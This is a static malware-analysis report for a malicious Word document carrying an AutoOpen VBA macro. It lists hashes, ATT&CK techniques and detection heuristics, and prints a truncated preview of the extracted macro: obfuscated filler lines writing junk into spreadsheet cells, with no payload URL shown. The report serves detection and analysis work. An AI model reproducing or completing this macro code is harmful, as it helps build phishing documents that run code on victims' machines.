Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6110e52ac2001ac3…

MALICIOUS

Office (OOXML)

51.5 KB Created: 2021-05-20 14:39:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-05-26
MD5: 84b210184734e8763a7935f3c9538725 SHA-1: 9a2af1bcccad2df74a74da1df20564239df3d644 SHA-256: 6110e52ac2001ac309e378ed399ccada4135464bc17268bfb022d7aac224d9c2
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro utilizes CreateObject to execute arbitrary code, a common technique for downloading and executing further malicious payloads. The presence of the AutoOpen macro and the CreateObject call strongly suggests a malicious intent, likely for initial execution of a second-stage malware.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 60307 bytes
SHA-256: c9d71c25b2e6dbff70d291af8eb2182b2c44d07c51baaf6919407553b8807db4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function ORzj(RMFUxz As Object)
RMFUxz.Application.Cells(659, 7) = "97"
RMFUxz.Application.Cells(437, 26) = "yUf"
RMFUxz.Application.Cells(583, 7) = "20"
RMFUxz.Application.Cells(369, 7) = "815"
RMFUxz.Application.Cells(286, 11) = "krhKEScul"
RMFUxz.Application.Cells(614, 6) = "bjqPkp"
RMFUxz.Application.Cells(649, 24) = "997"
RMFUxz.Application.Cells(883, 6) = "JTCoqqbz"
RMFUxz.Application.Cells(700, 17) = "200"
RMFUxz.Application.Cells(912, 14) = "614"
RMFUxz.Application.Cells(495, 5) = "nwbgF"
RMFUxz.Application.Cells(770, 21) = "rTpOx"
RMFUxz.Application.Cells(163, 17) = "AqE"
RMFUxz.Application.Cells(326, 23) = "98"
RMFUxz.Application.Cells(519, 16) = "WwUAbRI"
RMFUxz.Application.Cells(281, 6) = "423"
RMFUxz.Application.Cells(389, 10) = "peEVXZbg"
RMFUxz.Application.Cells(570, 15) = "125"
RMFUxz.Application.Cells(391, 18) = "zVdDO"
RMFUxz.Application.Cells(729, 18) = "435"
RMFUxz.Application.Cells(843, 20) = "94"
RMFUxz.Application.Cells(748, 26) = "43"
RMFUxz.Application.Cells(502, 16) = "828"
RMFUxz.Application.Cells(184, 24) = "LFfoP"
RMFUxz.Application.Cells(247, 13) = "856"
RMFUxz.Application.Cells(282, 5) = "99"
RMFUxz.Application.Cells(489, 17) = "TAdoCJ"
RMFUxz.Application.Cells(885, 26) = "IJfrr"
RMFUxz.Application.Cells(168, 1) = "aegEKBj"
RMFUxz.Application.Cells(354, 9) = "638"
RMFUxz.Application.Cells(878, 20) = "Rbrw"
RMFUxz.Application.Cells(936, 17) = "ESsGVb"
RMFUxz.Application.Cells(113, 1) = "eCrSOHgmm"
RMFUxz.Application.Cells(719, 25) = "501"
RMFUxz.Application.Cells(911, 18) = "326"
RMFUxz.Application.Cells(593, 12) = "nxKYG"
RMFUxz.Application.Cells(206, 25) = "100"
RMFUxz.Application.Cells(805, 15) = "ldKaCn"
RMFUxz.Application.Cells(253, 6) = "644"
RMFUxz.Application.Cells(516, 10) = "pdLzWCp"
RMFUxz.Application.Cells(599, 21) = "424"
RMFUxz.Application.Cells(695, 21) = "365"
RMFUxz.Application.Cells(278, 7) = "101"
RMFUxz.Application.Cells(178, 13) = "ehUrczL"
RMFUxz.Application.Cells(759, 8) = "804"
RMFUxz.Application.Cells(557, 7) = "966"
RMFUxz.Application.Cells(383, 18) = "218"
RMFUxz.Application.Cells(895, 2) = "jNYUkvGQ"
RMFUxz.Application.Cells(284, 17) = "tap"
RMFUxz.Application.Cells(212, 2) = "bqNASOWSA"
RMFUxz.Application.Cells(528, 8) = "421"
RMFUxz.Application.Cells(131, 1) = "8"
RMFUxz.Application.Cells(337, 13) = "ijlv"
RMFUxz.Application.Cells(445, 11) = "ZLoudHq"
RMFUxz.Application.Cells(986, 20) = "lGBfZfjNg"
RMFUxz.Application.Cells(606, 13) = "363"
RMFUxz.Application.Cells(491, 19) = "wNVRf"
RMFUxz.Application.Cells(387, 22) = "558"
RMFUxz.Application.Cells(617, 25) = "306"
RMFUxz.Application.Cells(258, 22) = "102"
RMFUxz.Application.Cells(674, 13) = "Ozh"
RMFUxz.Application.Cells(986, 8) = "689"
RMFUxz.Application.Cells(388, 1) = "815"
RMFUxz.Application.Cells(327, 14) = "384"
RMFUxz.Application.Cells(611, 24) = "619"
RMFUxz.Application.Cells(579, 9) = "ZOVED"
RMFUxz.Application.Cells(148, 12) = "dQMwsa"
RMFUxz.Application.Cells(828, 11) = "apC"
RMFUxz.Application.Cells(424, 7) = "367"
RMFUxz.Application.Cells(985, 2) = "zcTvre"
RMFUxz.Application.Cells(734, 2) = "702"
RMFUxz.Application.Cells(646, 15) = "OogMKNB"
RMFUxz.Application.Cells(696, 11) = "SGGIA"
RMFUxz.Application.Cells(405, 8) = "fWeL"
RMFUxz.Application.Cells(619, 1) = "bIWUxqmz"
RMFUxz.Application.Cells(752, 9) = "eYHF"
RMFUxz.Application.Cells(710, 20) = "cvLhcAia"
RMFUxz.Application.Cells(675, 24) = "XIOydzVl"
RMFUxz.Application.Cells(352, 12) = "dVTxeItI"
RMFUxz.Application.Cells(847, 11) = "103"
RMFUxz.Application.Cells(160, 18) = "sknkv"
RMFUxz.Application.Cells(454, 25) = "fGmuYdQi"
RMFUxz.Application.Cells(590, 26) = "245"
RMFUxz.Application.Cells(507, 21) = "tTzh"
RMFUxz.Applicatio
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 91136 bytes
SHA-256: efdc21c9cc61540b39cb3dec2fa5de5a58e450966339deed5f649c48dc6f2f4e

Open this report in the interactive analyzer, or submit your own file for analysis.